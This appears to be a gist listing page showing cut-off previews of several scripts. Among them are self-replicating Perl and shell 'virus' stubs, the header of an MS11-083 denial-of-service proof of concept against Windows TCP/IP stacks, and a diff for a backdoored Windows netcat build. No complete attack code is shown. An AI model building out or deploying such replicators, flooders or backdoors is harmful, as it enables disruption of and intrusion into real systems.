This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
#bsearch.sh by ThreaT | |
for fichier in * | |
do | |
file $fichier > /tmp/t | |
if grep "shell" /tmp/t > /dev/null; then | |
echo "$fichier est un Bourne shell script" | |
fi | |
done | |
rm -f /tmp/t |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
#virii bash, by fakessh @ | |
echo "je suis une chaine viral" | |
echo "je suis une chaine porteuse" | |
echo "--------------------------" | |
echo "attention, le petit virus vas sortir" | |
echo "------------------- ------" | |
grep "MvM" $0 | |
echo "il est sortie à l'ecran" | |
echo "mais il peut sortir aussi dans un fichier" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/opt/perl/bin/perl -w | |
use strict; | |
# HACKED | |
BEGIN { | |
local *ME; | |
if (open ME, $0) { | |
local $/; | |
my $me = <ME>; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
# Self-referencing, static-data permuting bizneratch-o-fun | |
# | |
# Writes a copy of itself out to STDOUT, and executes | |
# $payload (which currently writes to STDERR. | |
# | |
# For best results: | |
# $ ./replicate.pl > replicate.dup | |
# | |
# prole@subterrain.net |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl -w | |
use strict; | |
use warnings; | |
use Net::TFTP; | |
use Net::Ping; | |
use Data::Dumper; | |
use FileHandle; | |
BEGIN | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##http://www.cpan.org/src/5.0/fixsperl-0 | |
## emulate setuid root program | |
#!/usr/bin/perl | |
# Usage: | |
# To fix one or more specific suidperl executables in, say, /usr/bin: | |
# cd /usr/bin | |
# fixsperl sperl?.??? | |
# or, to check all $PATH directories for sperl?.??? and fix them, just say: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* MS11-083 DoS/PoC exploit | |
* ======================== | |
* This attempts to trigger the ICMP refCount overflow | |
* in TCP/IP stack of Win7/Vista/Win2k8 hosts. This | |
* requires sending 2^32 UDP packets to a host on a closed | |
* port, or 4,294,967,296 packets. A dereference function | |
* must be called that is not triggered via UDP but ICMP | |
* echo packets. This exploit creates 250 threads and | |
* floods a host with UDP packets and then attempts to |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define _WIN32_WINNT 0x0502 // Windows Server 2003 family | |
// For Win Xp, change accordingly... | |
#define _WIN32_WINNT 0x0501 | |
// #define _WIN32_WINNT 0x0500 // Windows 2000 | |
// #define _WIN32_WINNT 0x0400 // Windows NT 4.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# This software is provided by the copyright owner "as is" and any | |
# expressed or implied warranties, including, but not limited to, | |
# the implied warranties of merchantability and fitness for a particular | |
# purpose are disclaimed. In no event shall the copyright owner be | |
# liable for any direct, indirect, incidential, special, exemplary or | |
# consequential damages, including, but not limited to, procurement | |
# of substitute goods or services, loss of use, data or profits or | |
# business interruption, however caused and on any theory of liability, | |
# whether in contract, strict liability, or tort, including negligence |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Les fichiers binaires /home/swilting/Téléchargements/nc/doexec.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/doexec.o sont différents. | |
diff -crB /home/swilting/Téléchargements/nc/getopt.c /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c | |
*** /home/swilting/Téléchargements/nc/getopt.c 1996-11-06 22:40:36.000000000 +0100 | |
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c 2012-10-26 15:30:01.812133992 +0200 | |
*************** | |
*** 45,51 **** | |
#include <stdio.h> | |
#ifdef WIN32 | |
! #include <string.h> |